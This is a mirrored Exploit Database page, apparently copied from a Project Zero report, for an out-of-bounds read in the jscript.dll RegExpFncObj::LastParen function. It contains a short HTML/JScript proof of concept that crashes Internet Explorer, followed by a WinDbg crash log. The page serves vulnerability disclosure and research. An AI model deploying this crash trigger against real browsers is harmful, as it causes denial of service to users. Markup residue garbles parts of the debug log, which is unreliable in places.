Microsoft Windows – ‘jscript!RegExpFncObj::LastParen’ Out-of-Bounds Read

• Exploit Database
• 108 阅读

• 作者： Google Security Research
  日期： 2017-12-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43372/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92

  <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1382   There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):   PoC for IE (note: page heap might be required to obsorve the crash):   ========================================= -->   <!-- saved from url=(0014)about:internet --> <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> <script language="Jscript.Encode">   function go() { var r= new RegExp(Array(100).join(&apos;()&apos;)); &apos;&apos;.search(r); alert(RegExp.lastParen); }   go();   </script>   <!-- =========================================   Debug log:   =========================================   (cec.a14): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. jscript!RegExpFncObj::LastParen+0x43: 000007fe<code>f23d3813 4863accbac000000 movsxdrbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000</code>04770154=????????   0:014> r rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 r8=00000000130f9210r9=0000000000000000 r10=000000000463fef0 r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000 r14=00000000130f9210 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033ss=002bds=002bes=002bfs=0053gs=002b efl=00010206 jscript!RegExpFncObj::LastParen+0x43: 000007fe<code>f23d3813 4863accbac000000 movsxdrbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000</code>04770154=????????   0:014> k # Child-SPRetAddr Call Site 00 00000000<code>130f9090 000007fe</code>f2385e6d jscript!RegExpFncObj::LastParen+0x43 01 00000000<code>130f90e0 000007fe</code>f236b293 jscript!NameTbl::GetVal+0x3d5 02 00000000<code>130f9170 000007fe</code>f2369d27 jscript!VAR::InvokeByName+0x873 03 00000000<code>130f9380 000007fe</code>f2368ec2 jscript!CScriptRuntime::Run+0x373 04 00000000<code>130fa180 000007fe</code>f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162 05 00000000<code>130fa390 000007fe</code>f23686ea jscript!NameTbl::InvokeInternal+0x2d3 06 00000000<code>130fa4b0 000007fe</code>f23624b8 jscript!VAR::InvokeByDispID+0xffffffff<code>ffffffea 07 00000000</code>130fa500 000007fe<code>f2368ec2 jscript!CScriptRuntime::Run+0x5a6 08 00000000</code>130fb300 000007fe<code>f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 09 00000000</code>130fb510 000007fe<code>f2368b95 jscript!ScrFncObj::Call+0xb7 0a 00000000</code>130fb5b0 000007fe<code>f236e6c0 jscript!CSession::Execute+0x19e 0b 00000000</code>130fb680 000007fe<code>f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a 0c 00000000</code>130fb750 000007fe<code>f23768d6 jscript!COleScript::ParseScriptTextCore+0x267 0d 00000000</code>130fb840 000007fe<code>e9a85251 jscript!COleScript::ParseScriptText+0x56 0e 00000000</code>130fb8a0 000007fe<code>ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 0f 00000000</code>130fb920 000007fe<code>e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f 10 00000000</code>130fba00 000007fe<code>e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9 11 00000000</code>130fbbd0 000007fe<code>e9a85a11 MSHTML!CScriptData::Execute+0x283 12 00000000</code>130fbc90 000007fe<code>ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101 13 00000000</code>130fbcd0 000007fe<code>e9b28a5b MSHTML!CHtmParseBase::Execute+0x235 14 00000000</code>130fbd70 000007fe<code>e9a02e39 MSHTML!CHtmPost::Broadcast+0x90 15 00000000</code>130fbdb0 000007fe<code>e9a5caef MSHTML!CHtmPost::Exec+0x4bb 16 00000000</code>130fbfc0 000007fe<code>e9a5ca40 MSHTML!CHtmPost::Run+0x3f 17 00000000</code>130fbff0 000007fe<code>e9a5da12 MSHTML!PostManExecute+0x70 18 00000000</code>130fc070 000007fe<code>e9a60843 MSHTML!PostManResume+0xa1 19 00000000</code>130fc0b0 000007fe<code>e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 1a 00000000</code>130fc100 000007fe<code>ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41 1b 00000000</code>130fc130 000007fe<code>e9969d75 MSHTML!GlobalWndOnMethodCall+0x240 1c 00000000</code>130fc1d0 00000000<code>771f9bbd MSHTML!GlobalWndProc+0x150 1d 00000000</code>130fc250 00000000<code>771f98c2 USER32!UserCallWinProcCheckWow+0x1ad 1e 00000000</code>130fc310 000007fe<code>f2694a87 USER32!DispatchMessageWorker+0x3b5 1f 00000000</code>130fc390 000007fe<code>f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 20 00000000</code>130ff610 000007fe<code>fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3 21 00000000</code>130ff740 000007fe<code>f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f 22 00000000</code>130ff770 00000000<code>772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f 23 00000000</code>130ff7c0 00000000<code>7742a561 kernel32!BaseThreadInitThunk+0xd 24 00000000</code>130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d   ========================================= -->